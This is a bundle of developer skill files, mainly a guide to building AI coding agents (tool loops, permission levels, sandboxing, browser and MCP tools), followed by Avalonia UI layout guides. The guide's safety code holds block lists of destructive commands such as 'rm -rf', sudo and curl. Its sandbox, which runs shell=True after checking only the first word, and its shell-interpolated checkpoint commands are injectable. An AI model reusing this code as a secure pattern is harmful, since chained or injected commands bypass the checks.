                    result = self._execute_tool(tool_call)

                    # Observe: Add result to history
                    self.history.append({
                        "role": "tool",
                        "tool_call_id": tool_call.id,
                        "content": str(result)
                    })
            else:
                # No more tool calls = task complete
                return response.content

        return "Max iterations reached"

    def _execute_tool(self, tool_call) -> Any:
        tool = self.tools[tool_call.name]
        args = json.loads(tool_call.arguments)
        return tool.execute(**args)
```
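A compressed, self-contained run of the same loop with a stubbed LLM and a single `echo` tool shows one full think/act/observe cycle before the model stops requesting tools. All stub names here are illustrative, not part of any real provider API:

```python
import json

class StubToolCall:
    def __init__(self, id, name, arguments):
        self.id, self.name, self.arguments = id, name, arguments

class StubResponse:
    def __init__(self, content=None, tool_calls=None):
        self.content, self.tool_calls = content, tool_calls or []

class StubLLM:
    """First turn: request the echo tool. Second turn: answer and stop."""
    def __init__(self):
        self.turn = 0
    def chat(self, messages, tools=None, tool_choice=None):
        self.turn += 1
        if self.turn == 1:
            return StubResponse(tool_calls=[StubToolCall("1", "echo", json.dumps({"text": "hi"}))])
        return StubResponse(content="done: " + messages[-1]["content"])

def run_loop(llm, tools, task, max_iterations=5):
    history = [{"role": "user", "content": task}]
    for _ in range(max_iterations):
        response = llm.chat(history)          # Think
        if response.tool_calls:
            for call in response.tool_calls:  # Act
                result = tools[call.name](**json.loads(call.arguments))
                history.append({"role": "tool", "tool_call_id": call.id,
                                "content": str(result)})  # Observe
        else:
            return response.content           # No tool calls = finished
    return "Max iterations reached"

print(run_loop(StubLLM(), {"echo": lambda text: text.upper()}, "say hi"))  # → prints "done: HI"
```

The loop terminates on the first response without tool calls; the `max_iterations` cap is the safety net against a model that never stops calling tools.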
### 1.2 Multi-Model Architecture

```python
class MultiModelAgent:
    """
    Use different models for different purposes:
    - Fast model for planning
    - Powerful model for complex reasoning
    - Specialized model for code generation
    """

    def __init__(self):
        self.models = {
            "fast": "gpt-3.5-turbo",    # Quick decisions
            "smart": "gpt-4-turbo",     # Complex reasoning
            "code": "claude-3-sonnet",  # Code generation
        }

    def select_model(self, task_type: str) -> str:
        if task_type == "planning":
            return self.models["fast"]
        elif task_type == "analysis":
            return self.models["smart"]
        elif task_type == "code":
            return self.models["code"]
        return self.models["smart"]
```

---
## 2. Tool Design Patterns

### 2.1 Tool Schema

```python
class Tool:
    """Base class for agent tools"""

    @property
    def schema(self) -> dict:
        """JSON Schema for the tool"""
        return {
            "name": self.name,
            "description": self.description,
            "parameters": {
                "type": "object",
                "properties": self._get_parameters(),
                "required": self._get_required()
            }
        }

    def execute(self, **kwargs) -> ToolResult:
        """Execute the tool and return result"""
        raise NotImplementedError

class ReadFileTool(Tool):
    name = "read_file"
    description = "Read the contents of a file from the filesystem"

    def _get_parameters(self):
        return {
            "path": {
                "type": "string",
                "description": "Absolute path to the file"
            },
            "start_line": {
                "type": "integer",
                "description": "Line to start reading from (1-indexed)"
            },
            "end_line": {
                "type": "integer",
                "description": "Line to stop reading at (inclusive)"
            }
        }

    def _get_required(self):
        return ["path"]

    def execute(self, path: str, start_line: int = None, end_line: int = None) -> ToolResult:
        try:
            with open(path, 'r') as f:
                lines = f.readlines()

            if start_line and end_line:
                lines = lines[start_line-1:end_line]

            return ToolResult(
                success=True,
                output="".join(lines)
            )
        except FileNotFoundError:
            return ToolResult(
                success=False,
                error=f"File not found: {path}"
            )
```
### 2.2 Essential Agent Tools

```python
CODING_AGENT_TOOLS = {
    # File operations
    "read_file": "Read file contents",
    "write_file": "Create or overwrite a file",
    "edit_file": "Make targeted edits to a file",
    "list_directory": "List files and folders",
    "search_files": "Search for files by pattern",

    # Code understanding
    "search_code": "Search for code patterns (grep)",
    "get_definition": "Find function/class definition",
    "get_references": "Find all references to a symbol",

    # Terminal
    "run_command": "Execute a shell command",
    "read_output": "Read command output",
    "send_input": "Send input to running command",

    # Browser (optional)
    "open_browser": "Open URL in browser",
    "click_element": "Click on page element",
    "type_text": "Type text into input",
    "screenshot": "Capture screenshot",

    # Context
    "ask_user": "Ask the user a question",
    "search_web": "Search the web for information"
}
```
### 2.3 Edit Tool Design

```python
class EditFileTool(Tool):
    """
    Precise file editing with conflict detection.
    Uses search/replace pattern for reliable edits.
    """

    name = "edit_file"
    description = "Edit a file by replacing specific content"

    def execute(
        self,
        path: str,
        search: str,
        replace: str,
        expected_occurrences: int = 1
    ) -> ToolResult:
        """
        Args:
            path: File to edit
            search: Exact text to find (must match exactly, including whitespace)
            replace: Text to replace with
            expected_occurrences: How many times search should appear (validation)
        """
        with open(path, 'r') as f:
            content = f.read()

        # Validate: check the not-found case first, then the count mismatch
        actual_occurrences = content.count(search)
        if actual_occurrences == 0:
            return ToolResult(
                success=False,
                error="Search text not found in file"
            )

        if actual_occurrences != expected_occurrences:
            return ToolResult(
                success=False,
                error=f"Expected {expected_occurrences} occurrences, found {actual_occurrences}"
            )

        # Apply edit
        new_content = content.replace(search, replace)

        with open(path, 'w') as f:
            f.write(new_content)

        return ToolResult(
            success=True,
            output=f"Replaced {actual_occurrences} occurrence(s)"
        )
```

---
## 3. Permission & Safety Patterns

### 3.1 Permission Levels

```python
from enum import Enum

class PermissionLevel(Enum):
    # Fully automatic - no user approval needed
    AUTO = "auto"

    # Ask once per session
    ASK_ONCE = "ask_once"

    # Ask every time
    ASK_EACH = "ask_each"

    # Never allow
    NEVER = "never"

PERMISSION_CONFIG = {
    # Low risk - can auto-approve
    "read_file": PermissionLevel.AUTO,
    "list_directory": PermissionLevel.AUTO,
    "search_code": PermissionLevel.AUTO,

    # Medium risk - ask once
    "write_file": PermissionLevel.ASK_ONCE,
    "edit_file": PermissionLevel.ASK_ONCE,

    # High risk - ask each time
    "run_command": PermissionLevel.ASK_EACH,
    "delete_file": PermissionLevel.ASK_EACH,

    # Dangerous - never auto-approve
    "sudo_command": PermissionLevel.NEVER,
    "format_disk": PermissionLevel.NEVER
}
```
### 3.2 Approval UI Pattern

```python
class ApprovalManager:
    def __init__(self, ui, config):
        self.ui = ui
        self.config = config
        self.session_approvals = {}

    def request_approval(self, tool_name: str, args: dict) -> bool:
        level = self.config.get(tool_name, PermissionLevel.ASK_EACH)

        if level == PermissionLevel.AUTO:
            return True

        if level == PermissionLevel.NEVER:
            self.ui.show_error(f"Tool '{tool_name}' is not allowed")
            return False

        if level == PermissionLevel.ASK_ONCE:
            if tool_name in self.session_approvals:
                return self.session_approvals[tool_name]

        # Show approval dialog
        approved = self.ui.show_approval_dialog(
            tool=tool_name,
            args=args,
            risk_level=self._assess_risk(tool_name, args)
        )

        if level == PermissionLevel.ASK_ONCE:
            self.session_approvals[tool_name] = approved

        return approved

    def _assess_risk(self, tool_name: str, args: dict) -> str:
        """Analyze specific call for risk level"""
        if tool_name == "run_command":
            cmd = args.get("command", "")
            if any(danger in cmd for danger in ["rm -rf", "sudo", "chmod"]):
                return "HIGH"
            return "MEDIUM"
        return "LOW"  # default for tools without a specific rule
```
### 3.3 Sandboxing

```python
import os
import shlex
import subprocess

class SandboxedExecution:
    """
    Execute code/commands in isolated environment
    """

    def __init__(self, workspace_dir: str):
        self.workspace = workspace_dir
        self.allowed_commands = ["npm", "python", "node", "git", "ls", "cat"]
        self.blocked_paths = ["/etc", "/usr", "/bin", os.path.expanduser("~")]

    def validate_path(self, path: str) -> bool:
        """Ensure path is within workspace"""
        real_path = os.path.realpath(path)
        workspace_real = os.path.realpath(self.workspace)
        # Trailing separator so "/ws-evil" does not pass as inside "/ws"
        return real_path == workspace_real or real_path.startswith(workspace_real + os.sep)

    def validate_command(self, command: str) -> bool:
        """Check if command is allowed"""
        cmd_parts = shlex.split(command)
        if not cmd_parts:
            return False

        base_cmd = cmd_parts[0]
        return base_cmd in self.allowed_commands

    def execute_sandboxed(self, command: str) -> ToolResult:
        if not self.validate_command(command):
            return ToolResult(
                success=False,
                error=f"Command not allowed: {command}"
            )

        # Execute in isolated environment
        result = subprocess.run(
            command,
            shell=True,
            cwd=self.workspace,
            capture_output=True,
            timeout=30,
            env={
                **os.environ,
                "HOME": self.workspace,  # Isolate home directory
            }
        )

        return ToolResult(
            success=result.returncode == 0,
            output=result.stdout.decode(),
            error=result.stderr.decode() if result.returncode != 0 else None
        )
```
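The workspace check hinges on `os.path.realpath`, which collapses `..` segments and resolves symlinks before the prefix comparison, and on appending a path separator so that sibling directories such as `/tmp/agent-ws-evil` cannot masquerade as `/tmp/agent-ws`. A quick standalone sketch of that behavior (all paths are illustrative):

```python
import os

def is_inside(workspace: str, path: str) -> bool:
    # realpath collapses ".." and resolves symlinks before comparing
    real = os.path.realpath(path)
    root = os.path.realpath(workspace)
    # trailing separator prevents "/tmp/ws-evil" matching "/tmp/ws"
    return real == root or real.startswith(root + os.sep)
```

With this, `is_inside("/tmp/agent-ws", "/tmp/agent-ws/../etc/passwd")` is rejected because the `..` is collapsed away before the prefix test ever runs.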
---
## 4. Browser Automation

### 4.1 Browser Tool Pattern

```python
import base64

class BrowserTool:
    """
    Browser automation for agents using Playwright/Puppeteer.
    Enables visual debugging and web testing.
    """

    def __init__(self, headless: bool = True):
        self.browser = None
        self.page = None
        self.headless = headless

    async def open_url(self, url: str) -> ToolResult:
        """Navigate to URL and return page info"""
        if not self.browser:
            # `playwright` is assumed to be a started async_playwright instance
            self.browser = await playwright.chromium.launch(headless=self.headless)
            self.page = await self.browser.new_page()

        await self.page.goto(url)

        # Capture state
        screenshot = await self.page.screenshot(type='png')
        title = await self.page.title()

        return ToolResult(
            success=True,
            output=f"Loaded: {title}",
            metadata={
                "screenshot": base64.b64encode(screenshot).decode(),
                "url": self.page.url
            }
        )

    async def click(self, selector: str) -> ToolResult:
        """Click on an element"""
        try:
            await self.page.click(selector, timeout=5000)
            await self.page.wait_for_load_state("networkidle")

            screenshot = await self.page.screenshot()
            return ToolResult(
                success=True,
                output=f"Clicked: {selector}",
                metadata={"screenshot": base64.b64encode(screenshot).decode()}
            )
        except TimeoutError:
            return ToolResult(
                success=False,
                error=f"Element not found: {selector}"
            )

    async def type_text(self, selector: str, text: str) -> ToolResult:
        """Type text into an input"""
        await self.page.fill(selector, text)
        return ToolResult(success=True, output=f"Typed into {selector}")

    async def get_page_content(self) -> ToolResult:
        """Get accessible text content of the page"""
        content = await self.page.evaluate("""
            () => {
                // Get visible text
                const walker = document.createTreeWalker(
                    document.body,
                    NodeFilter.SHOW_TEXT,
                    null,
                    false
                );

                let text = '';
                while (walker.nextNode()) {
                    const node = walker.currentNode;
                    if (node.textContent.trim()) {
                        text += node.textContent.trim() + '\\n';
                    }
                }
                return text;
            }
        """)
        return ToolResult(success=True, output=content)
```
### 4.2 Visual Agent Pattern

```python
import json

class VisualAgent:
    """
    Agent that uses screenshots to understand web pages.
    Can identify elements visually without selectors.
    """

    def __init__(self, llm, browser):
        self.llm = llm
        self.browser = browser

    async def describe_page(self) -> str:
        """Use vision model to describe current page"""
        screenshot = await self.browser.screenshot()

        response = self.llm.chat([
            {
                "role": "user",
                "content": [
                    {"type": "text", "text": "Describe this webpage. List all interactive elements you see."},
                    {"type": "image", "data": screenshot}
                ]
            }
        ])

        return response.content

    async def find_and_click(self, description: str) -> ToolResult:
        """Find element by visual description and click it"""
        screenshot = await self.browser.screenshot()

        # Ask vision model to find element
        response = self.llm.chat([
            {
                "role": "user",
                "content": [
                    {
                        "type": "text",
                        "text": f"""
                        Find the element matching: "{description}"
                        Return the approximate coordinates as JSON: {{"x": number, "y": number}}
                        """
                    },
                    {"type": "image", "data": screenshot}
                ]
            }
        ])

        coords = json.loads(response.content)
        await self.browser.page.mouse.click(coords["x"], coords["y"])

        return ToolResult(success=True, output=f"Clicked at ({coords['x']}, {coords['y']})")
```

---
## 5. Context Management

### 5.1 Context Injection Patterns

````python
import json
import os

import requests

class ContextManager:
    """
    Manage context provided to the agent.
    Inspired by Cline's @-mention patterns.
    """

    def __init__(self, workspace: str):
        self.workspace = workspace
        self.context = []

    def add_file(self, path: str) -> None:
        """@file - Add file contents to context"""
        with open(path, 'r') as f:
            content = f.read()

        self.context.append({
            "type": "file",
            "path": path,
            "content": content
        })

    def add_folder(self, path: str, max_files: int = 20) -> None:
        """@folder - Add files in folder, up to max_files total"""
        added = 0
        for root, dirs, files in os.walk(path):
            for file in files:
                if added >= max_files:
                    return
                self.add_file(os.path.join(root, file))
                added += 1

    def add_url(self, url: str) -> None:
        """@url - Fetch and add URL content"""
        response = requests.get(url)
        # html_to_markdown: project-specific HTML-to-markdown helper
        content = html_to_markdown(response.text)

        self.context.append({
            "type": "url",
            "url": url,
            "content": content
        })

    def add_problems(self, diagnostics: list) -> None:
        """@problems - Add IDE diagnostics"""
        self.context.append({
            "type": "diagnostics",
            "problems": diagnostics
        })

    def format_for_prompt(self) -> str:
        """Format all context for LLM prompt"""
        parts = []
        for item in self.context:
            if item["type"] == "file":
                parts.append(f"## File: {item['path']}\n```\n{item['content']}\n```")
            elif item["type"] == "url":
                parts.append(f"## URL: {item['url']}\n{item['content']}")
            elif item["type"] == "diagnostics":
                parts.append(f"## Problems:\n{json.dumps(item['problems'], indent=2)}")

        return "\n\n".join(parts)
````
### 5.2 Checkpoint/Resume

```python
import json
import os
import subprocess
from datetime import datetime

class CheckpointManager:
    """
    Save and restore agent state for long-running tasks.
    """

    def __init__(self, storage_dir: str):
        self.storage_dir = storage_dir
        os.makedirs(storage_dir, exist_ok=True)

    def save_checkpoint(self, session_id: str, state: dict) -> str:
        """Save current agent state"""
        checkpoint = {
            "timestamp": datetime.now().isoformat(),
            "session_id": session_id,
            "history": state["history"],
            "context": state["context"],
            "workspace_state": self._capture_workspace(state["workspace"]),
            "metadata": state.get("metadata", {})
        }

        path = os.path.join(self.storage_dir, f"{session_id}.json")
        with open(path, 'w') as f:
            json.dump(checkpoint, f, indent=2)

        return path

    def restore_checkpoint(self, checkpoint_path: str) -> dict:
        """Restore agent state from checkpoint"""
        with open(checkpoint_path, 'r') as f:
            checkpoint = json.load(f)

        return {
            "history": checkpoint["history"],
            "context": checkpoint["context"],
            "workspace": self._restore_workspace(checkpoint["workspace_state"]),
            "metadata": checkpoint["metadata"]
        }

    def _capture_workspace(self, workspace: str) -> dict:
        """Capture relevant workspace state"""
        # Git status, file hashes, etc.
        return {
            "git_ref": subprocess.getoutput(f"cd {workspace} && git rev-parse HEAD"),
            "git_dirty": subprocess.getoutput(f"cd {workspace} && git status --porcelain")
        }
```

---
## 6. MCP (Model Context Protocol) Integration

### 6.1 MCP Server Pattern

```python
from mcp import Server, Tool

class MCPAgent:
    """
    Agent that can dynamically discover and use MCP tools.
    'Add a tool that...' pattern from Cline.
    """

    def __init__(self, llm):
        self.llm = llm
        self.mcp_servers = {}
        self.available_tools = {}

    def connect_server(self, name: str, config: dict) -> None:
        """Connect to an MCP server"""
        server = Server(config)
        self.mcp_servers[name] = server

        # Discover tools
        tools = server.list_tools()
        for tool in tools:
            self.available_tools[tool.name] = {
                "server": name,
                "schema": tool.schema
            }

    async def create_tool(self, description: str) -> str:
        """
        Create a new MCP server based on user description.
        'Add a tool that fetches Jira tickets'
        """
        # Generate MCP server code
        code = self.llm.generate(f"""
        Create a Python MCP server with a tool that does:
        {description}

        Use the FastMCP framework. Include proper error handling.
        Return only the Python code.
        """)

        # Save and install
        server_name = self._extract_name(description)
        path = f"./mcp_servers/{server_name}/server.py"

        with open(path, 'w') as f:
            f.write(code)

        # Hot-reload
        self.connect_server(server_name, {"path": path})

        return f"Created tool: {server_name}"
```

---
## Best Practices Checklist

### Agent Design

- [ ] Clear task decomposition
- [ ] Appropriate tool granularity
- [ ] Error handling at each step
- [ ] Progress visibility to user

### Safety

- [ ] Permission system implemented
- [ ] Dangerous operations blocked
- [ ] Sandbox for untrusted code
- [ ] Audit logging enabled
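For the "dangerous operations blocked" item, even a crude allowlist gate in front of the shell tool goes a long way. A minimal sketch (the allowed and blocked token sets are illustrative, not a complete policy):

```python
import shlex

ALLOWED_BINARIES = {"ls", "cat", "git", "grep"}   # illustrative allowlist
BLOCKED_TOKENS = {"rm", "sudo", "curl", ">"}      # illustrative deny tokens

def is_permitted(command: str) -> bool:
    """Approve a shell command only if it starts with an allowed binary
    and contains no blocked token anywhere in its arguments."""
    tokens = shlex.split(command)
    if not tokens or tokens[0] not in ALLOWED_BINARIES:
        return False
    return all(tok not in BLOCKED_TOKENS for tok in tokens)

assert is_permitted("git status")
assert not is_permitted("rm -rf /")
assert not is_permitted("git push; sudo reboot")
```

Real deployments should pair a gate like this with sandboxing and audit logging rather than rely on string filtering alone.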

### UX

- [ ] Approval UI is clear
- [ ] Progress updates provided
- [ ] Undo/rollback available
- [ ] Explanation of actions

---

## Resources

- [Cline](https://github.com/cline/cline)
- [OpenAI Codex](https://github.com/openai/codex)
- [Model Context Protocol](https://modelcontextprotocol.io/)
- [Anthropic Tool Use](https://docs.anthropic.com/claude/docs/tool-use)
73
packages/llm/skills/autonomous-agents/SKILL.md
Normal file
@ -0,0 +1,73 @@
---
name: autonomous-agents
description: "Autonomous agents are AI systems that can independently decompose goals, plan actions, execute tools, and self-correct without constant human guidance. The challenge isn't making them capable - it'..."
risk: unknown
source: "vibeship-spawner-skills (Apache 2.0)"
date_added: "2026-02-27"
---

# Autonomous Agents

You are an agent architect who has learned the hard lessons of autonomous AI. You've seen the gap between impressive demos and production disasters. You know that a 95% success rate per step means only 60% by step 10.
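The 95%-to-60% figure is just compounding: with per-step success probability p, an n-step chain succeeds with probability p ** n.

```python
per_step = 0.95
for steps in (1, 5, 10, 20):
    print(steps, round(per_step ** steps, 3))
# At 10 steps, 0.95 ** 10 ≈ 0.599 — roughly the 60% quoted above.
```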

Your core insight: Autonomy is earned, not granted. Start with heavily constrained agents that do one thing reliably. Add autonomy only as you prove reliability. The best agents look less impressive but work consistently.

You push for guardrails before capabilities, and logging before autonomy.
## Capabilities

- autonomous-agents
- agent-loops
- goal-decomposition
- self-correction
- reflection-patterns
- react-pattern
- plan-execute
- agent-reliability
- agent-guardrails

## Patterns

### ReAct Agent Loop

Alternating reasoning and action steps
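A skeletal version of the loop, with a stub standing in for the model (the `FINAL:` convention and the stub responses are illustrative assumptions, not a real API):

```python
def react_loop(llm, tools, goal, max_steps=5):
    """Alternate thought/action with observations until the model answers."""
    transcript = f"Goal: {goal}"
    for _ in range(max_steps):
        step = llm(transcript)                # model emits the next action
        if step.startswith("FINAL:"):
            return step[len("FINAL:"):].strip()
        tool, _, arg = step.partition(" ")
        observation = tools[tool](arg)        # act, then feed the result back
        transcript += f"\n{step}\nObservation: {observation}"
    return "step budget exhausted"            # hard cap keeps autonomy bounded

# Stubbed model: first picks a tool, then answers.
responses = iter(["add 2,3", "FINAL: the answer is 5"])
result = react_loop(
    llm=lambda _: next(responses),
    tools={"add": lambda arg: sum(int(x) for x in arg.split(","))},
    goal="add 2 and 3",
)
print(result)  # the answer is 5
```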

### Plan-Execute Pattern

Separate planning phase from execution
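Sketched with hard-coded stand-ins for the planner and executor (a real agent would back both with an LLM and tools):

```python
def plan_then_execute(planner, executor, goal):
    """Produce the full plan up front, then run each step in order."""
    plan = planner(goal)                       # planning phase: no side effects yet
    return [executor(step) for step in plan]   # execution phase

plan_stub = lambda goal: ["read file", "summarize", "write summary"]
exec_stub = lambda step: f"done: {step}"

results = plan_then_execute(plan_stub, exec_stub, "summarize a file")
print(results)
# ['done: read file', 'done: summarize', 'done: write summary']
```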

### Reflection Pattern

Self-evaluation and iterative improvement

## Anti-Patterns

### ❌ Unbounded Autonomy

### ❌ Trusting Agent Outputs

### ❌ General-Purpose Autonomy

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | Reduce step count |
| Issue | critical | Set hard cost limits |
| Issue | critical | Test at scale before production |
| Issue | high | Validate against ground truth |
| Issue | high | Build robust API clients |
| Issue | high | Least privilege principle |
| Issue | medium | Track context usage |
| Issue | medium | Structured logging |

## Related Skills

Works well with: `agent-tool-builder`, `agent-memory-systems`, `multi-agent-orchestration`, `agent-evaluation`

## When to Use

Use this skill to execute the workflow and actions described in the overview.
64
packages/llm/skills/avalonia-layout-zafiro/SKILL.md
Normal file
@ -0,0 +1,64 @@
---
name: avalonia-layout-zafiro
description: "Guidelines for modern Avalonia UI layout using Zafiro.Avalonia, emphasizing shared styles, generic components, and avoiding XAML redundancy."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Avalonia Layout with Zafiro.Avalonia

> Master modern, clean, and maintainable Avalonia UI layouts.
> **Focus on semantic containers, shared styles, and minimal XAML.**

## 🎯 Selective Reading Rule

**Read ONLY the files relevant to the layout challenge!**

---

## 📑 Content Map

| File | Description | When to Read |
|------|-------------|--------------|
| `themes.md` | Theme organization and shared styles | Setting up or refining app themes |
| `containers.md` | Semantic containers (`HeaderedContainer`, `EdgePanel`, `Card`) | Structuring views and layouts |
| `icons.md` | Icon usage with `IconExtension` and `IconOptions` | Adding and customizing icons |
| `behaviors.md` | `Xaml.Interaction.Behaviors` and avoiding Converters | Implementing complex interactions |
| `components.md` | Generic components and avoiding nesting | Creating reusable UI elements |

---

## 🔗 Related Project (Exemplary Implementation)

For a real-world example, refer to the **Angor** project:
`/mnt/fast/Repos/angor/src/Angor/Avalonia/Angor.Avalonia.sln`

---

## ✅ Checklist for Clean Layouts

- [ ] **Used semantic containers?** (e.g., `HeaderedContainer` instead of `Border` with a manual header)
- [ ] **Avoided redundant properties?** Use shared styles in `axaml` files.
- [ ] **Minimized nesting?** Flatten layouts using `EdgePanel` or generic components.
- [ ] **Icons via extension?** Use `{Icon fa-name}` and `IconOptions` for styling.
- [ ] **Behaviors over code-behind?** Use `Interaction.Behaviors` for UI logic.
- [ ] **Avoided Converters?** Prefer ViewModel properties or Behaviors unless necessary.

---

## ❌ Anti-Patterns

**DON'T:**
- Use hardcoded colors or sizes (literals) in views.
- Create deep nesting of `Grid` and `StackPanel`.
- Repeat visual properties across multiple elements (use Styles).
- Use `IValueConverter` for simple logic that belongs in the ViewModel.

**DO:**
- Use `DynamicResource` for colors and brushes.
- Extract repeated layouts into generic components.
- Leverage `Zafiro.Avalonia`-specific panels like `EdgePanel` for common UI patterns.

## When to Use

Use this skill to execute the workflow and actions described in the overview.
35
packages/llm/skills/avalonia-layout-zafiro/behaviors.md
Normal file
@ -0,0 +1,35 @@
# Interactions and Logic

To keep XAML clean and maintainable, minimize logic in views and avoid excessive use of converters.

## 🎭 Xaml.Interaction.Behaviors

Use `Interaction.Behaviors` to handle UI-related logic that doesn't belong in the ViewModel, such as focus management, animations, or specialized event handling.

```xml
<TextBox Text="{Binding Address}">
    <Interaction.Behaviors>
        <UntouchedClassBehavior />
    </Interaction.Behaviors>
</TextBox>
```

### Why use Behaviors?
- **Encapsulation**: UI logic is contained in a reusable behavior class.
- **Clean XAML**: Avoids code-behind and complex XAML triggers.
- **Testability**: Behaviors can be tested independently of the View.

## 🚫 Avoiding Converters

Converters often lead to "magical" logic hidden in XAML. Whenever possible, prefer:

1. **ViewModel Properties**: Let the ViewModel provide the final data format (e.g., a `string` formatted for display).
2. **MultiBinding**: Use for simple logic combinations (And/Or) directly in XAML.
3. **Behaviors**: For more complex interactions that involve state or events.

### When to use Converters?
Only use them when the conversion is purely visual and highly reusable across different contexts (e.g., `BoolToOpacityConverter`).

## 🧩 Simplified Interactions

If you find yourself needing a complex converter or behavior, consider whether the component can be simplified or the data model adjusted to make the view binding more direct.
41
packages/llm/skills/avalonia-layout-zafiro/components.md
Normal file
@ -0,0 +1,41 @@
# Building Generic Components

Reducing nesting and complexity is achieved by breaking down views into generic, reusable components.

## 🧊 Generic Components

Instead of building large, complex views, extract recurring patterns into small `UserControl`s.

### Example: A generic "Summary Item"
Instead of repeating a `Grid` with labels and values:

```xml
<!-- ❌ BAD: Repeated Grid -->
<Grid ColumnDefinitions="*,Auto">
    <TextBlock Text="Total:" />
    <TextBlock Grid.Column="1" Text="{Binding Total}" />
</Grid>
```

Create a generic component (or use `EdgePanel` with a Style):

```xml
<!-- ✅ GOOD: Use a specialized control or style -->
<EdgePanel StartContent="Total:" EndContent="{Binding Total}" Classes="SummaryItem" />
```

## 📉 Flattening Layouts

Avoid deep nesting. Deeply nested XAML is hard to read and can impact performance.

- **StackPanel vs Grid**: Use `StackPanel` (with `Spacing`) for simple linear layouts.
- **EdgePanel**: Great for "Label - Value" or "Icon - Text - Action" rows.
- **UniformGrid**: Use for grids where all cells are the same size.

## 🔧 Component Granularity

- **Atomic**: Small controls like custom buttons or icons.
- **Molecular**: Groups of atoms, like a `HeaderedContainer` with specific content.
- **Organisms**: Higher-level sections of a page.

Aim for components that are generic enough to be reused but specific enough to simplify the parent view significantly.
50
packages/llm/skills/avalonia-layout-zafiro/containers.md
Normal file
@ -0,0 +1,50 @@
# Semantic Containers

Using the right container for the data type simplifies XAML and improves maintainability. `Zafiro.Avalonia` provides specialized controls for common layout patterns.

## 📦 HeaderedContainer

Prefer `HeaderedContainer` over a `Border` or `Grid` when a section needs a title or header.

```xml
<HeaderedContainer Header="Security Settings" Classes="WizardSection">
    <StackPanel>
        <!-- Content here -->
    </StackPanel>
</HeaderedContainer>
```

### Key Properties:
- `Header`: The content or string for the header.
- `HeaderBackground`: Brush for the header area.
- `ContentPadding`: Padding for the content area.

## ↔️ EdgePanel

Use `EdgePanel` to position elements at the edges of a container without complex `Grid` definitions.

```xml
<EdgePanel StartContent="{Icon fa-wallet}"
           Content="Wallet Balance"
           EndContent="$1,234.00" />
```

### Slots:
- `StartContent`: Aligned to the left (or beginning).
- `Content`: Fills the remaining space in the middle.
- `EndContent`: Aligned to the right (or end).

## 📇 Card

A simple container for grouping related information, often used inside `HeaderedContainer` or as a standalone element in a list.

```xml
<Card Header="Enter recipient address:">
    <TextBox Text="{Binding Address}" />
</Card>
```

## 📐 Best Practices

- Use `Classes` to apply themed variants (e.g., `Classes="Section"`, `Classes="Highlight"`).
- Customize internal parts of the containers using templates in your styles when necessary, rather than nesting more controls.
53
packages/llm/skills/avalonia-layout-zafiro/icons.md
Normal file
@ -0,0 +1,53 @@
# Icon Usage

`Zafiro.Avalonia` simplifies icon management using a specialized markup extension and styling options.

## 🛠️ IconExtension

Use the `{Icon}` markup extension to easily include icons from libraries like FontAwesome.

```xml
<!-- Positional parameter -->
<Button Content="{Icon fa-wallet}" />

<!-- Named parameter -->
<ContentControl Content="{Icon Source=fa-gear}" />
```

## 🎨 IconOptions

`IconOptions` allows you to customize icons without manually wrapping them in other controls. It's often used in styles to provide a consistent look.

```xml
<Style Selector="HeaderedContainer /template/ ContentPresenter#Header EdgePanel /template/ ContentControl#StartContent">
    <Setter Property="IconOptions.Size" Value="20" />
    <Setter Property="IconOptions.Fill" Value="{DynamicResource Accent}" />
    <Setter Property="IconOptions.Padding" Value="10" />
    <Setter Property="IconOptions.CornerRadius" Value="10" />
</Style>
```

### Common Properties:
- `IconOptions.Size`: Sets the width and height of the icon.
- `IconOptions.Fill`: The color/brush of the icon.
- `IconOptions.Background`: Background brush for the icon container.
- `IconOptions.Padding`: Padding inside the icon container.
- `IconOptions.CornerRadius`: Corner radius if a background is used.

## 📁 Shared Icon Resources

Define icons as resources for reuse across the application.

```xml
<ResourceDictionary xmlns="https://github.com/avaloniaui">
    <Icon x:Key="fa-wallet" Source="fa-wallet" />
</ResourceDictionary>
```

Then use them with `StaticResource` if they are already defined:

```xml
<Button Content="{StaticResource fa-wallet}" />
```

However, the `{Icon ...}` extension is usually preferred for its brevity and ability to create new icon instances on the fly.
51
packages/llm/skills/avalonia-layout-zafiro/themes.md
Normal file
@ -0,0 +1,51 @@
# Theme Organization and Shared Styles

Efficient theme organization is key to avoiding redundant XAML and ensuring visual consistency.

## 🏗️ Structure

Follow the pattern from Angor:

1. **Colors & Brushes**: Define in a dedicated `Colors.axaml`. Use `DynamicResource` to support theme switching.
2. **Styles**: Group styles by category (e.g., `Buttons.axaml`, `Containers.axaml`, `Typography.axaml`).
3. **App-wide Theme**: Aggregate all styles in a main `Theme.axaml`.

## 🎨 Avoiding Redundancy

Instead of setting properties directly on elements:

```xml
<!-- ❌ BAD: Redundant properties -->
<HeaderedContainer CornerRadius="10" BorderThickness="1" BorderBrush="Blue" Background="LightBlue" />
<HeaderedContainer CornerRadius="10" BorderThickness="1" BorderBrush="Blue" Background="LightBlue" />

<!-- ✅ GOOD: Use Classes and Styles -->
<HeaderedContainer Classes="BlueSection" />
<HeaderedContainer Classes="BlueSection" />
```

Define the style in a shared `axaml` file:

```xml
<Style Selector="HeaderedContainer.BlueSection">
    <Setter Property="CornerRadius" Value="10" />
    <Setter Property="BorderThickness" Value="1" />
    <Setter Property="BorderBrush" Value="{DynamicResource Accent}" />
    <Setter Property="Background" Value="{DynamicResource SurfaceSubtle}" />
</Style>
```

## 🧩 Shared Icons and Resources

Centralize icon definitions and other shared resources in `Icons.axaml` and include them in the `MergedDictionaries` of your theme or `App.axaml`.

```xml
<Application.Resources>
    <ResourceDictionary>
        <ResourceDictionary.MergedDictionaries>
            <MergeResourceInclude Source="UI/Themes/Styles/Containers.axaml" />
            <MergeResourceInclude Source="UI/Shared/Resources/Icons.axaml" />
        </ResourceDictionary.MergedDictionaries>
    </ResourceDictionary>
</Application.Resources>
```
35
packages/llm/skills/avalonia-viewmodels-zafiro/SKILL.md
Normal file
@ -0,0 +1,35 @@
---
name: avalonia-viewmodels-zafiro
description: "Optimal ViewModel and Wizard creation patterns for Avalonia using Zafiro and ReactiveUI."
risk: unknown
source: community
date_added: "2026-02-27"
---

# Avalonia ViewModels with Zafiro

This skill provides a set of best practices and patterns for creating ViewModels, Wizards, and managing navigation in Avalonia applications, leveraging the power of **ReactiveUI** and the **Zafiro** toolkit.

## Core Principles

1. **Functional-Reactive Approach**: Use ReactiveUI (`ReactiveObject`, `WhenAnyValue`, etc.) to handle state and logic.
